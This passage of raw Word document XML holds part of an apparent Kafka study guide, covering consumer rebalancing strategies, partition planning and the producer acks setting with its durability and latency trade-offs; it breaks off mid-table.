    <w:p w14:paraId="589DD2C0" w14:textId="77777777" w:rsidR="008C5CA5"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FA3E68">
          <v:rect id="_x0000_i3287" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB01CB" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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5. Stagger Consumer Startups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70708DC1"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Avoid mass rebalance by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>staggering</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the start of multiple consumers—especially during </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autoscaling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB0A1E" w14:textId="77777777" w:rsidR="008C5CA5"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E38F638">
          <v:rect id="_x0000_i3288" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFF50B" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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6. Optimize Partition Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C288028"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nsure enough partitions to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C98494" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Balance workload</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFF9F5" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Support </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254FDD4"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lastRenderedPageBreak/>
        <w:t>Rule of thumb:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Number of partitions ≥ Number of consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A6EFB" w14:textId="77777777" w:rsidR="008C5CA5"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A4AA565">
          <v:rect id="_x0000_i3289" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA0592B" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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86"/>
        <w:gridCol w:w="3442"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="42E0036B" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E89AA20" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62506FDB" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="7657E12D" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26EFF810"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nsumerRebalanceListener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F0C4FA2"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Handle offset commits &amp; restores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5BD7CA4C" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246667B2"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operativeStickyAssignor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A4E452"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Reduce rebalance disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="35344F13" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00789B68"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group.instance.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEE976F"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Avoid unnecessary rebalances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="4EF067BD" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32CA5166"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tagger startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16A18ECF"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Avoid rebalancing storms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="222528BE" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C89942"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nfig tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AC682B"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Improve stability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3305C67E" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0698C2D0"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artition planning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D766B79" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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cale efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57E503AE" w14:textId="5E96D60A"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C83D17C">
          <v:rect id="_x0000_i3290" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB01CE" w14:textId="42132982" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="001C3542" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="818" w:name="_Toc196308298"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of Kafka's Producer Acknowledgments</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="818"/>
    </w:p>
    <w:p w14:paraId="2D5F4F16" w14:textId="1DFF7ED4" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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Role of Kafka’s Producer Acknowledgments (acks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69B89D"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Kafka producer acknowledgments determine </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how many brokers must confirm receipt of a message</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before it is considered successfully "sent". This impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC2CA9" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA3021" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F052892" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F246EC" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Message delivery guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097BC6D" w14:textId="77777777" w:rsidR="00F04AF9"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43BDDE8">
          <v:rect id="_x0000_i3291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="382482A1" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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acks Configuration Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB43CF1"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You can set the acks parameter in the producer config as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C92DD50"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rops.put("acks", "all"); // or "0", "1", "all"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29413854" w14:textId="77777777" w:rsidR="00F04AF9"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7BCDD00">
          <v:rect id="_x0000_i3292" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="461AC881" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Values and Their Mean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5"/>
        <w:gridCol w:w="3704"/>
        <w:gridCol w:w="1410"/>
        <w:gridCol w:w="1324"/>
        <w:gridCol w:w="2621"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="58AB0971" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8ADC7A" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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acks Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4638DF1B" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ED3DDC9" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70F02CBA" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F0CB10" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5FDCACCB" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34960BB8"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4C593F"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No ack</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Kafka. Producer doesn't wait for any response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B08CA10"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>🟥</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lowest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B3C8B2C"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>🟩</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lowest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB3FC23"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❗</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> High risk of data loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="334FDEE3" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDDDF09"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC21656"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Leader broker </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>acks after writing to its log</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, not waiting for followers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49DFD8AD"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>🟨</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B88535E"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>🟨</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F313EB"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Risk if leader crashes before replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="22F67151" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A266D01"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all (or -1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F307E3A"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Waits for </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all in-sync replicas (ISR)</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to acknowledge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1267601F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
